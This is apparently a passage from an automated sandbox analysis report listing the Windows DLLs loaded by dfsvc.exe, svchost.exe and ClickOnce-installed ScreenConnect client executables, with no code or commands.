Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: uiautomationcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: dfshim.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: urlmon.dll
